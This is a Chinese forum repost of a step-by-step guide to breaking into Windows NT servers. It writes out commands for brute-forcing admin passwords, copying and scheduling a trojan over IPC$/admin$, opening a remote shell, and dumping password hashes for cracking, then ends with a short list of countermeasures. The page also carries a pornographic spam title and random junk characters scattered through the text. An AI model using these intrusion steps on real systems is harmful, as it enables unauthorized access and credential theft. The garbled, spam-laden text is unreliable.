亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

<address id="xly8e"><var id="xly8e"><center id="xly8e"></center></var></address>
<kbd id="xly8e"><dl id="xly8e"></dl></kbd>


<bdo id="xly8e"><mark id="xly8e"><legend id="xly8e"></legend></mark></bdo>
  • 

    • <span id="xly8e"><delect id="xly8e"></delect></span>
    

    汶上信息港
    
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁(yè)]
    

    
作者: 雜七雜八    時(shí)間: 2011-1-12 16:31
    
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
    看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺(jué)真是。??磥?lái)nt系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 . U& o, ?7 ~* s' X  k3 m5 D3 |7 |
    
    其攻擊過(guò)程如下: 
    
" W" `, q' c7 k$ F; Z1、使用掃描工具查找NT主機(jī)       
    
+ O& A5 N1 _9 \0 y; W2 、確定攻擊目標(biāo)后,使用letmein 對(duì)目標(biāo)主機(jī)進(jìn)行攻擊, 如:   m5 a! s& Y* o; v
    
letmein file://x.x.x.x/ -all -g mypwd (對(duì)\\x.x.x.x上所有用戶(hù)攻擊) 
    
4 K3 a( ]7 r: `$ r! F( yletmein file://x.x.x.x/ -admin -g mypwd (對(duì)\\x.x.x.x上管理員攻擊) 
    
1 W' x( X4 x  ^0 u3 b) b1 |! @letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶(hù)) 6 L7 X5 s* H9 [; h8 z1 k/ J
    
注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 # I/ T8 m7 z' _0 a& |/ b' a& s: q
    
3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: 
    
9 v/ t  T* D1 W. O$ `5 ]net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 
    
, k0 s, c* y2 X: H6 jcopy x:\netserver.exe \\x.x.x.x\admin$\system32 ' a: a. L( c, \  Q. I
    
4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù): 
    
: o' G3 B2 l6 B: Z1 Q' t$ U! g" J0 enetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 
    
$ |% [) R/ e7 v+ a: e$ V2 h; K3 {% D- i, g
    
   該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) 7 R* a& B% w/ f" z
    
: x% Q4 g/ Q5 B. n! {$ q7 Z
    
   另一種方法: 
    
. _% T/ W  G; o! {- V4 ~   將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng)
    
, P: H4 x: L+ `+ Z% ^5 w( I$ b! r+ f! s, X. j) z, G
    
    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 
    
- Z4 d9 x0 x! ?    如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶(hù)和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來(lái)運(yùn)算。 分析該次攻擊的整體過(guò)程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(mén)(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對(duì)letmein只是多花幾分鐘而已。我對(duì)某些大的公共平臺(tái)服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺(tái)有配備火墻,但是沒(méi)有封閉對(duì)外137-139口。 9 f3 j$ \# D2 a2 {% a
    

    
$ k& [  E$ K5 _0 o0 t) v- ?     對(duì)策: 5 A* O; M2 |: r2 V; v
    
1、還是老話(huà),密碼的選擇問(wèn)題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。 2 y. G* Y1 V. c
    
2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對(duì)外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。 * E4 O& H3 j1 a& u/ X) `
    
3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開(kāi)這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來(lái)代替。 
    
" t; k" Q! X2 m; o+ a4 T4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對(duì)文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 . v( v# ?% P  b7 [
    
5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無(wú)疑對(duì)你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽(tīng)不到的聲音卻無(wú)時(shí)不刻在影響著你 。% x& ]* o8 C2 ]0 L' L
    





    

    

    歡迎光臨 汶上信息港 (http://m.loveproblemguru.com/)

Powered by Discuz! X3.5